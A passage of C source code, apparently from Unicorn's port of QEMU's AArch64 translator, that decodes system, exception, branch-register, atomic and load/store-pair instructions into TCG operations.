gen_helper_rebuild_hflags_a64(tcg_ctx, tcg_ctx->cpu_env, tcg_el); tcg_temp_free_i32(tcg_ctx, tcg_el); /* * We default to ending the TB on a coprocessor register write, * but allow this to be suppressed by the register definition * (usually only necessary to work around guest bugs). */ s->base.is_jmp = DISAS_UPDATE; } may_gen_set_label(s, label); } /* System * 31 22 21 20 19 18 16 15 12 11 8 7 5 4 0 * +---------------------+---+-----+-----+-------+-------+-----+------+ * | 1 1 0 1 0 1 0 1 0 0 | L | op0 | op1 | CRn | CRm | op2 | Rt | * +---------------------+---+-----+-----+-------+-------+-----+------+ */ static void disas_system(DisasContext *s, uint32_t insn) { unsigned int l, op0, op1, crn, crm, op2, rt; l = extract32(insn, 21, 1); op0 = extract32(insn, 19, 2); op1 = extract32(insn, 16, 3); crn = extract32(insn, 12, 4); crm = extract32(insn, 8, 4); op2 = extract32(insn, 5, 3); rt = extract32(insn, 0, 5); if (op0 == 0) { if (l || rt != 31) { unallocated_encoding(s); return; } switch (crn) { case 2: /* HINT (including allocated hints like NOP, YIELD, etc) */ handle_hint(s, insn, op1, op2, crm); break; case 3: /* CLREX, DSB, DMB, ISB */ handle_sync(s, insn, op1, op2, crm); break; case 4: /* MSR (immediate) */ handle_msr_i(s, insn, op1, op2, crm); break; default: unallocated_encoding(s); break; } return; } handle_sys(s, insn, l, op0, op1, op2, crn, crm, rt); } /* Exception generation * * 31 24 23 21 20 5 4 2 1 0 * +-----------------+-----+------------------------+-----+----+ * | 1 1 0 1 0 1 0 0 | opc | imm16 | op2 | LL | * +-----------------------+------------------------+----------+ */ static void disas_exc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opc = extract32(insn, 21, 3); int op2_ll = extract32(insn, 0, 5); int imm16 = extract32(insn, 5, 16); TCGv_i32 tmp; switch (opc) { case 0: /* For SVC, HVC and SMC we advance the single-step state * machine before taking the exception.
This is architecturally * mandated, to ensure that single-stepping a system call * instruction works properly. */ switch (op2_ll) { case 1: /* SVC */ gen_ss_advance(s); gen_exception_insn(s, s->base.pc_next, EXCP_SWI, syn_aa64_svc(imm16), default_exception_el(s)); break; case 2: /* HVC */ if (s->current_el == 0) { unallocated_encoding(s); break; } /* The pre HVC helper handles cases when HVC gets trapped * as an undefined insn by runtime configuration. */ gen_a64_set_pc_im(tcg_ctx, s->pc_curr); gen_helper_pre_hvc(tcg_ctx, tcg_ctx->cpu_env); gen_ss_advance(s); gen_exception_insn(s, s->base.pc_next, EXCP_HVC, syn_aa64_hvc(imm16), 2); break; case 3: /* SMC */ if (s->current_el == 0) { unallocated_encoding(s); break; } gen_a64_set_pc_im(tcg_ctx, s->pc_curr); tmp = tcg_const_i32(tcg_ctx, syn_aa64_smc(imm16)); gen_helper_pre_smc(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_ss_advance(s); gen_exception_insn(s, s->base.pc_next, EXCP_SMC, syn_aa64_smc(imm16), 3); break; default: unallocated_encoding(s); break; } break; case 1: if (op2_ll != 0) { unallocated_encoding(s); break; } /* BRK */ gen_exception_bkpt_insn(s, syn_aa64_bkpt(imm16)); break; case 2: if (op2_ll != 0) { unallocated_encoding(s); break; } /* HLT. This has two purposes. * Architecturally, it is an external halting debug instruction. * Since QEMU doesn't implement external debug, we treat this as * it is required for halting debug disabled: it will UNDEF. * Secondly, "HLT 0xf000" is the A64 semihosting syscall instruction. */ #if 0 if (semihosting_enabled() && imm16 == 0xf000) { /* In system mode, don't allow userspace access to semihosting, * to provide some semblance of security (and for consistency * with our 32-bit semihosting). */ if (s->current_el == 0) { unsupported_encoding(s, insn); break; } gen_exception_internal_insn(s, s->pc_curr, EXCP_SEMIHOST); } else { unsupported_encoding(s, insn); } #endif unsupported_encoding(s, insn); break; case 5: if (op2_ll < 1 || op2_ll > 3) { unallocated_encoding(s); break; } /* DCPS1, DCPS2, DCPS3 */ unsupported_encoding(s, insn); break; default: unallocated_encoding(s); break; } } /* Unconditional branch (register) * 31 25 24 21 20 16 15 10 9 5 4 0 * +---------------+-------+-------+-------+------+-------+ * | 1 1 0 1 0 1 1 | opc | op2 | op3 | Rn | op4 | * +---------------+-------+-------+-------+------+-------+ */ static void disas_uncond_b_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int opc, op2, op3, rn, op4; unsigned btype_mod = 2; /* 0: BR, 1: BLR, 2: other */ TCGv_i64 dst; TCGv_i64 modifier; opc = extract32(insn, 21, 4); op2 = extract32(insn, 16, 5); op3 = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); op4 = extract32(insn, 0, 5); if (op2 != 0x1f) { goto do_unallocated; } switch (opc) { case 0: /* BR */ case 1: /* BLR */ case 2: /* RET */ btype_mod = opc; switch (op3) { case 0: /* BR, BLR, RET */ if (op4 != 0) { goto do_unallocated; } dst = cpu_reg(s, rn); break; case 2: case 3: if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } if (opc == 2) { /* RETAA, RETAB */ if (rn != 0x1f || op4 != 0x1f) { goto do_unallocated; } rn = 30; modifier = tcg_ctx->cpu_X[31]; } else { /* BRAAZ, BRABZ, BLRAAZ, BLRABZ */ if (op4 != 0x1f) { goto do_unallocated; } modifier = new_tmp_a64_zero(s); } if (s->pauth_active) { dst = new_tmp_a64(s); if (op3 == 2) { gen_helper_autia(tcg_ctx, dst, tcg_ctx->cpu_env, cpu_reg(s, rn), modifier); } else { gen_helper_autib(tcg_ctx, dst, tcg_ctx->cpu_env, cpu_reg(s, rn), modifier); } } else { 
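/* Pointer authentication not active: use the target address
 * unmodified, skipping the AUTIA/AUTIB step. */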
dst = cpu_reg(s, rn); } break; default: goto do_unallocated; } gen_a64_set_pc(s, dst); /* BLR also needs to load return address */ if (opc == 1) { tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->base.pc_next); } break; case 8: /* BRAA */ case 9: /* BLRAA */ if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } if ((op3 & ~1) != 2) { goto do_unallocated; } btype_mod = opc & 1; if (s->pauth_active) { dst = new_tmp_a64(s); modifier = cpu_reg_sp(s, op4); if (op3 == 2) { gen_helper_autia(tcg_ctx, dst, tcg_ctx->cpu_env, cpu_reg(s, rn), modifier); } else { gen_helper_autib(tcg_ctx, dst, tcg_ctx->cpu_env, cpu_reg(s, rn), modifier); } } else { dst = cpu_reg(s, rn); } gen_a64_set_pc(s, dst); /* BLRAA also needs to load return address */ if (opc == 9) { tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->base.pc_next); } break; case 4: /* ERET */ if (s->current_el == 0) { goto do_unallocated; } switch (op3) { case 0: /* ERET */ if (op4 != 0) { goto do_unallocated; } dst = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offsetof(CPUARMState, elr_el[s->current_el])); break; case 2: /* ERETAA */ case 3: /* ERETAB */ if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } if (rn != 0x1f || op4 != 0x1f) { goto do_unallocated; } dst = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offsetof(CPUARMState, elr_el[s->current_el])); if (s->pauth_active) { modifier = tcg_ctx->cpu_X[31]; if (op3 == 2) { gen_helper_autia(tcg_ctx, dst, tcg_ctx->cpu_env, dst, modifier); } else { gen_helper_autib(tcg_ctx, dst, tcg_ctx->cpu_env, dst, modifier); } } break; default: goto do_unallocated; } gen_helper_exception_return(tcg_ctx, tcg_ctx->cpu_env, dst); tcg_temp_free_i64(tcg_ctx, dst); /* Must exit loop to check un-masked IRQs */ s->base.is_jmp = DISAS_EXIT; return; case 5: /* DRPS */ if (op3 != 0 || op4 != 0 || rn != 0x1f) { goto do_unallocated; } else { unsupported_encoding(s, insn); } return; default: do_unallocated: unallocated_encoding(s); return; } switch (btype_mod) { case 0: /* BR */ if (dc_isar_feature(aa64_bti, s)) { /* BR to {x16,x17} or !guard -> 1, else 3. */ set_btype(s, rn == 16 || rn == 17 || !s->guarded_page ? 1 : 3); } break; case 1: /* BLR */ if (dc_isar_feature(aa64_bti, s)) { /* BLR sets BTYPE to 2, regardless of source guarded page. */ set_btype(s, 2); } break; default: /* RET or none of the above. */ /* BTYPE will be set to 0 by normal end-of-insn processing. */ break; } s->base.is_jmp = DISAS_JUMP; } /* Branches, exception generating and system instructions */ static void disas_b_exc_sys(DisasContext *s, uint32_t insn) { switch (extract32(insn, 25, 7)) { case 0x0a: case 0x0b: case 0x4a: case 0x4b: /* Unconditional branch (immediate) */ disas_uncond_b_imm(s, insn); break; case 0x1a: case 0x5a: /* Compare & branch (immediate) */ disas_comp_b_imm(s, insn); break; case 0x1b: case 0x5b: /* Test & branch (immediate) */ disas_test_b_imm(s, insn); break; case 0x2a: /* Conditional branch (immediate) */ disas_cond_b_imm(s, insn); break; case 0x6a: /* Exception generation / System */ if (insn & (1 << 24)) { if (extract32(insn, 22, 2) == 0) { disas_system(s, insn); } else { unallocated_encoding(s); } } else { disas_exc(s, insn); } break; case 0x6b: /* Unconditional branch (register) */ disas_uncond_b_reg(s, insn); break; default: unallocated_encoding(s); break; } } /* * Load/Store exclusive instructions are implemented by remembering * the value/address loaded, and seeing if these are the same * when the store is performed. 
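 * (In other words, a store-exclusive succeeds iff the monitored
 * address still holds the value the load-exclusive observed, so an
 * intervening write that restores the old value goes undetected.)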
This is not actually the architecturally * mandated semantics, but it works for typical guest code sequences * and avoids having to monitor regular stores. * * The store exclusive uses the atomic cmpxchg primitives to avoid * races in multi-threaded linux-user and when MTTCG softmmu is * enabled. */ static void gen_load_exclusive(DisasContext *s, int rt, int rt2, TCGv_i64 addr, int size, bool is_pair) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int idx = get_mem_index(s); MemOp memop = s->be_data; g_assert(size <= 3); if (is_pair) { g_assert(size >= 2); if (size == 2) { /* The pair must be single-copy atomic for the doubleword. */ memop |= MO_64 | MO_ALIGN; tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, addr, idx, memop); if (s->be_data == MO_LE) { tcg_gen_extract_i64(tcg_ctx, cpu_reg(s, rt), tcg_ctx->cpu_exclusive_val, 0, 32); tcg_gen_extract_i64(tcg_ctx, cpu_reg(s, rt2), tcg_ctx->cpu_exclusive_val, 32, 32); } else { tcg_gen_extract_i64(tcg_ctx, cpu_reg(s, rt), tcg_ctx->cpu_exclusive_val, 32, 32); tcg_gen_extract_i64(tcg_ctx, cpu_reg(s, rt2), tcg_ctx->cpu_exclusive_val, 0, 32); } } else { /* The pair must be single-copy atomic for *each* doubleword, not the entire quadword, however it must be quadword aligned. */ memop |= MO_64; tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, addr, idx, memop | MO_ALIGN_16); TCGv_i64 addr2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, addr2, addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_exclusive_high, addr2, idx, memop); tcg_temp_free_i64(tcg_ctx, addr2); tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt), tcg_ctx->cpu_exclusive_val); tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt2), tcg_ctx->cpu_exclusive_high); } } else { memop |= size | MO_ALIGN; tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, addr, idx, memop); tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt), tcg_ctx->cpu_exclusive_val); } tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, addr); } static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, TCGv_i64 addr, int size, int is_pair) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* if (env->exclusive_addr == addr && env->exclusive_val == [addr] * && (!is_pair || env->exclusive_high == [addr + datasize])) { * [addr] = {Rt}; * if (is_pair) { * [addr + datasize] = {Rt2}; * } * {Rd} = 0; * } else { * {Rd} = 1; * } * env->exclusive_addr = -1; */ TCGLabel *fail_label = gen_new_label(tcg_ctx); TCGLabel *done_label = gen_new_label(tcg_ctx); TCGv_i64 tmp; tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, addr, tcg_ctx->cpu_exclusive_addr, fail_label); tmp = tcg_temp_new_i64(tcg_ctx); if (is_pair) { if (size == 2) { if (s->be_data == MO_LE) { tcg_gen_concat32_i64(tcg_ctx, tmp, cpu_reg(s, rt), cpu_reg(s, rt2)); } else { tcg_gen_concat32_i64(tcg_ctx, tmp, cpu_reg(s, rt2), cpu_reg(s, rt)); } tcg_gen_atomic_cmpxchg_i64(tcg_ctx, tmp, tcg_ctx->cpu_exclusive_addr, tcg_ctx->cpu_exclusive_val, tmp, get_mem_index(s), MO_64 | MO_ALIGN | s->be_data); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, tmp, tmp, tcg_ctx->cpu_exclusive_val); } else if (tb_cflags(s->base.tb) & CF_PARALLEL) { if (!HAVE_CMPXCHG128) { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); s->base.is_jmp = DISAS_NORETURN; } else if (s->be_data == MO_LE) { gen_helper_paired_cmpxchg64_le_parallel(tcg_ctx, tmp, tcg_ctx->cpu_env, tcg_ctx->cpu_exclusive_addr, cpu_reg(s, rt), cpu_reg(s, rt2)); } else { gen_helper_paired_cmpxchg64_be_parallel(tcg_ctx, tmp, tcg_ctx->cpu_env, tcg_ctx->cpu_exclusive_addr, cpu_reg(s, rt), cpu_reg(s, rt2)); } } else if (s->be_data == MO_LE) { 
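/* !CF_PARALLEL: no other vCPU runs concurrently with this one,
 * so the plain (non-parallel) helper variant is sufficient. */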
gen_helper_paired_cmpxchg64_le(tcg_ctx, tmp, tcg_ctx->cpu_env, tcg_ctx->cpu_exclusive_addr, cpu_reg(s, rt), cpu_reg(s, rt2)); } else { gen_helper_paired_cmpxchg64_be(tcg_ctx, tmp, tcg_ctx->cpu_env, tcg_ctx->cpu_exclusive_addr, cpu_reg(s, rt), cpu_reg(s, rt2)); } } else { tcg_gen_atomic_cmpxchg_i64(tcg_ctx, tmp, tcg_ctx->cpu_exclusive_addr, tcg_ctx->cpu_exclusive_val, cpu_reg(s, rt), get_mem_index(s), size | MO_ALIGN | s->be_data); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, tmp, tmp, tcg_ctx->cpu_exclusive_val); } tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rd), tmp); tcg_temp_free_i64(tcg_ctx, tmp); tcg_gen_br(tcg_ctx, done_label); gen_set_label(tcg_ctx, fail_label); tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), 1); gen_set_label(tcg_ctx, done_label); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); } static void gen_compare_and_swap(DisasContext *s, int rs, int rt, int rn, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rs = cpu_reg(s, rs); TCGv_i64 tcg_rt = cpu_reg(s, rt); int memidx = get_mem_index(s); TCGv_i64 clean_addr; if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, tcg_rs, clean_addr, tcg_rs, tcg_rt, memidx, size | MO_ALIGN | s->be_data); } static void gen_compare_and_swap_pair(DisasContext *s, int rs, int rt, int rn, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 s1 = cpu_reg(s, rs); TCGv_i64 s2 = cpu_reg(s, rs + 1); TCGv_i64 t1 = cpu_reg(s, rt); TCGv_i64 t2 = cpu_reg(s, rt + 1); TCGv_i64 clean_addr; int memidx = get_mem_index(s); if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); if (size == 2) { TCGv_i64 cmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); if (s->be_data == MO_LE) { tcg_gen_concat32_i64(tcg_ctx, val, t1, t2); tcg_gen_concat32_i64(tcg_ctx, cmp, s1, s2); } else { tcg_gen_concat32_i64(tcg_ctx, val, t2, t1); tcg_gen_concat32_i64(tcg_ctx, cmp, s2, s1); } tcg_gen_atomic_cmpxchg_i64(tcg_ctx, cmp, clean_addr, cmp, val, memidx, MO_64 | MO_ALIGN | s->be_data); tcg_temp_free_i64(tcg_ctx, val); if (s->be_data == MO_LE) { tcg_gen_extr32_i64(tcg_ctx, s1, s2, cmp); } else { tcg_gen_extr32_i64(tcg_ctx, s2, s1, cmp); } tcg_temp_free_i64(tcg_ctx, cmp); } else if (tb_cflags(s->base.tb) & CF_PARALLEL) { if (HAVE_CMPXCHG128) { TCGv_i32 tcg_rs = tcg_const_i32(tcg_ctx, rs); if (s->be_data == MO_LE) { gen_helper_casp_le_parallel(tcg_ctx, tcg_ctx->cpu_env, tcg_rs, clean_addr, t1, t2); } else { gen_helper_casp_be_parallel(tcg_ctx, tcg_ctx->cpu_env, tcg_rs, clean_addr, t1, t2); } tcg_temp_free_i32(tcg_ctx, tcg_rs); } else { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); s->base.is_jmp = DISAS_NORETURN; } } else { TCGv_i64 d1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 d2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 a2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 c1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 c2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); /* Load the two words, in memory order. */ tcg_gen_qemu_ld_i64(tcg_ctx, d1, clean_addr, memidx, MO_64 | MO_ALIGN_16 | s->be_data); tcg_gen_addi_i64(tcg_ctx, a2, clean_addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, d2, a2, memidx, MO_64 | s->be_data); /* Compare the two words, also in memory order. */ tcg_gen_setcond_i64(tcg_ctx, TCG_COND_EQ, c1, d1, s1); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_EQ, c2, d2, s2); tcg_gen_and_i64(tcg_ctx, c2, c2, c1); /* If compare equal, write back new data, else write back old data. 
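 * (c2 is nonzero only when both words matched; the movcond pair below
 * then picks the new t1/t2, otherwise the just-loaded d1/d2 are
 * stored back unchanged.)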
*/ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, c1, c2, zero, t1, d1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, c2, c2, zero, t2, d2); tcg_gen_qemu_st_i64(tcg_ctx, c1, clean_addr, memidx, MO_64 | s->be_data); tcg_gen_qemu_st_i64(tcg_ctx, c2, a2, memidx, MO_64 | s->be_data); tcg_temp_free_i64(tcg_ctx, a2); tcg_temp_free_i64(tcg_ctx, c1); tcg_temp_free_i64(tcg_ctx, c2); tcg_temp_free_i64(tcg_ctx, zero); /* Write back the data from memory to Rs. */ tcg_gen_mov_i64(tcg_ctx, s1, d1); tcg_gen_mov_i64(tcg_ctx, s2, d2); tcg_temp_free_i64(tcg_ctx, d1); tcg_temp_free_i64(tcg_ctx, d2); } } /* Update the Sixty-Four bit (SF) registersize. This logic is derived * from the ARMv8 specs for LDR (Shared decode for all encodings). */ static bool disas_ldst_compute_iss_sf(int size, bool is_signed, int opc) { int opc0 = extract32(opc, 0, 1); int regsize; if (is_signed) { regsize = opc0 ? 32 : 64; } else { regsize = size == 3 ? 64 : 32; } return regsize == 64; } /* Load/store exclusive * * 31 30 29 24 23 22 21 20 16 15 14 10 9 5 4 0 * +-----+-------------+----+---+----+------+----+-------+------+------+ * | sz | 0 0 1 0 0 0 | o2 | L | o1 | Rs | o0 | Rt2 | Rn | Rt | * +-----+-------------+----+---+----+------+----+-------+------+------+ * * sz: 00 -> 8 bit, 01 -> 16 bit, 10 -> 32 bit, 11 -> 64 bit * L: 0 -> store, 1 -> load * o2: 0 -> exclusive, 1 -> not * o1: 0 -> single register, 1 -> register pair * o0: 1 -> load-acquire/store-release, 0 -> not */ static void disas_ldst_excl(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rt2 = extract32(insn, 10, 5); int rs = extract32(insn, 16, 5); int is_lasr = extract32(insn, 15, 1); int o2_L_o1_o0 = extract32(insn, 21, 3) * 2 | is_lasr; int size = extract32(insn, 30, 2); TCGv_i64 clean_addr; switch (o2_L_o1_o0) { case 0x0: /* STXR */ case 0x1: /* STLXR */ if (rn == 31) { gen_check_sp_alignment(s); } if (is_lasr) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); gen_store_exclusive(s, rs, rt, rt2, clean_addr, size, false); return; case 0x4: /* LDXR */ case 0x5: /* LDAXR */ if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); s->is_ldex = true; gen_load_exclusive(s, rt, rt2, clean_addr, size, false); if (is_lasr) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } return; case 0x8: /* STLLR */ if (!dc_isar_feature(aa64_lor, s)) { break; } /* StoreLORelease is the same as Store-Release for QEMU. */ /* fall through */ case 0x9: /* STLR */ /* Generate ISS for non-exclusive accesses including LASR. */ if (rn == 31) { gen_check_sp_alignment(s); } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); do_gpr_st(s, cpu_reg(s, rt), clean_addr, size, true, rt, disas_ldst_compute_iss_sf(size, false, 0), is_lasr); return; case 0xc: /* LDLAR */ if (!dc_isar_feature(aa64_lor, s)) { break; } /* LoadLOAcquire is the same as Load-Acquire for QEMU. */ /* fall through */ case 0xd: /* LDAR */ /* Generate ISS for non-exclusive accesses including LASR. 
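 * The acquire ordering itself comes from the TCG_BAR_LDAQ barrier
 * emitted after the load below.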
*/ if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); do_gpr_ld(s, cpu_reg(s, rt), clean_addr, size, false, false, true, rt, disas_ldst_compute_iss_sf(size, false, 0), is_lasr); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); return; case 0x2: case 0x3: /* CASP / STXP */ if (size & 2) { /* STXP / STLXP */ if (rn == 31) { gen_check_sp_alignment(s); } if (is_lasr) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); gen_store_exclusive(s, rs, rt, rt2, clean_addr, size, true); return; } if (rt2 == 31 && ((rt | rs) & 1) == 0 && dc_isar_feature(aa64_atomics, s)) { /* CASP / CASPL */ gen_compare_and_swap_pair(s, rs, rt, rn, size | 2); return; } break; case 0x6: case 0x7: /* CASPA / LDXP */ if (size & 2) { /* LDXP / LDAXP */ if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); s->is_ldex = true; gen_load_exclusive(s, rt, rt2, clean_addr, size, true); if (is_lasr) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } return; } if (rt2 == 31 && ((rt | rs) & 1) == 0 && dc_isar_feature(aa64_atomics, s)) { /* CASPA / CASPAL */ gen_compare_and_swap_pair(s, rs, rt, rn, size | 2); return; } break; case 0xa: /* CAS */ case 0xb: /* CASL */ case 0xe: /* CASA */ case 0xf: /* CASAL */ if (rt2 == 31 && dc_isar_feature(aa64_atomics, s)) { gen_compare_and_swap(s, rs, rt, rn, size); return; } break; } unallocated_encoding(s); } /* * Load register (literal) * * 31 30 29 27 26 25 24 23 5 4 0 * +-----+-------+---+-----+-------------------+-------+ * | opc | 0 1 1 | V | 0 0 | imm19 | Rt | * +-----+-------+---+-----+-------------------+-------+ * * V: 1 -> vector (simd/fp) * opc (non-vector): 00 -> 32 bit, 01 -> 64 bit, * 10-> 32 bit signed, 11 -> prefetch * opc (vector): 00 -> 32 bit, 01 -> 64 bit, 10 -> 128 bit (11 unallocated) */ static void disas_ld_lit(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int64_t imm = sextract32(insn, 5, 19) << 2; bool is_vector = extract32(insn, 26, 1); int opc = extract32(insn, 30, 2); bool is_signed = false; int size = 2; TCGv_i64 tcg_rt, clean_addr; if (is_vector) { if (opc == 3) { unallocated_encoding(s); return; } size = 2 + opc; if (!fp_access_check(s)) { return; } } else { if (opc == 3) { /* PRFM (literal) : prefetch */ return; } size = 2 + extract32(opc, 0, 1); is_signed = extract32(opc, 1, 1); } tcg_rt = cpu_reg(s, rt); clean_addr = tcg_const_i64(tcg_ctx, s->pc_curr + imm); if (is_vector) { do_fp_ld(s, rt, clean_addr, size); } else { /* Only unsigned 32bit loads target 32bit registers. 
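 * (In this encoding opc 00 is the sole 32-bit form; opc 01 is the
 * 64-bit load and opc 10 is the sign-extending LDRSW, both of which
 * write a 64-bit register, hence iss_sf = opc != 0 below.)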
*/ bool iss_sf = opc != 0; do_gpr_ld(s, tcg_rt, clean_addr, size, is_signed, false, true, rt, iss_sf, false); } tcg_temp_free_i64(tcg_ctx, clean_addr); } /* * LDNP (Load Pair - non-temporal hint) * LDP (Load Pair - non vector) * LDPSW (Load Pair Signed Word - non vector) * STNP (Store Pair - non-temporal hint) * STP (Store Pair - non vector) * LDNP (Load Pair of SIMD&FP - non-temporal hint) * LDP (Load Pair of SIMD&FP) * STNP (Store Pair of SIMD&FP - non-temporal hint) * STP (Store Pair of SIMD&FP) * * 31 30 29 27 26 25 24 23 22 21 15 14 10 9 5 4 0 * +-----+-------+---+---+-------+---+-----------------------------+ * | opc | 1 0 1 | V | 0 | index | L | imm7 | Rt2 | Rn | Rt | * +-----+-------+---+---+-------+---+-------+-------+------+------+ * * opc: LDP/STP/LDNP/STNP 00 -> 32 bit, 10 -> 64 bit * LDPSW 01 * LDP/STP/LDNP/STNP (SIMD) 00 -> 32 bit, 01 -> 64 bit, 10 -> 128 bit * V: 0 -> GPR, 1 -> Vector * idx: 00 -> signed offset with non-temporal hint, 01 -> post-index, * 10 -> signed offset, 11 -> pre-index * L: 0 -> Store 1 -> Load * * Rt, Rt2 = GPR or SIMD registers to be stored * Rn = general purpose register containing address * imm7 = signed offset (multiple of 4 or 8 depending on size) */ static void disas_ldst_pair(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rt2 = extract32(insn, 10, 5); uint64_t offset = sextract64(insn, 15, 7); int index = extract32(insn, 23, 2); bool is_vector = extract32(insn, 26, 1); bool is_load = extract32(insn, 22, 1); int opc = extract32(insn, 30, 2); bool is_signed = false; bool postindex = false; bool wback = false; TCGv_i64 clean_addr, dirty_addr; int size; if (opc == 3) { unallocated_encoding(s); return; } if (is_vector) { size = 2 + opc; } else { size = 2 + extract32(opc, 1, 1); is_signed = extract32(opc, 0, 1); if (!is_load && is_signed) { unallocated_encoding(s); return; } } switch (index) { case 1: /* post-index */ postindex = true; wback = true; break; case 0: /* signed offset with "non-temporal" hint. Since we don't emulate * caches we don't care about hints to the cache system about * data access patterns, and handle this identically to plain * signed offset. */ if (is_signed) { /* There is no non-temporal-hint version of LDPSW */ unallocated_encoding(s); return; } postindex = false; break; case 2: /* signed offset, rn not updated */ postindex = false; break; case 3: /* pre-index */ postindex = false; wback = true; break; } if (is_vector && !fp_access_check(s)) { return; } offset <<= size; if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); if (!postindex) { tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); } clean_addr = clean_data_tbi(s, dirty_addr); if (is_vector) { if (is_load) { do_fp_ld(s, rt, clean_addr, size); } else { do_fp_st(s, rt, clean_addr, size); } tcg_gen_addi_i64(tcg_ctx, clean_addr, clean_addr, 1ULL << size); if (is_load) { do_fp_ld(s, rt2, clean_addr, size); } else { do_fp_st(s, rt2, clean_addr, size); } } else { TCGv_i64 tcg_rt = cpu_reg(s, rt); TCGv_i64 tcg_rt2 = cpu_reg(s, rt2); if (is_load) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* Do not modify tcg_rt before recognizing any exception * from the second load. 
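 * The first value is therefore staged in a temporary and only
 * committed to Rt after both loads have completed without faulting.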
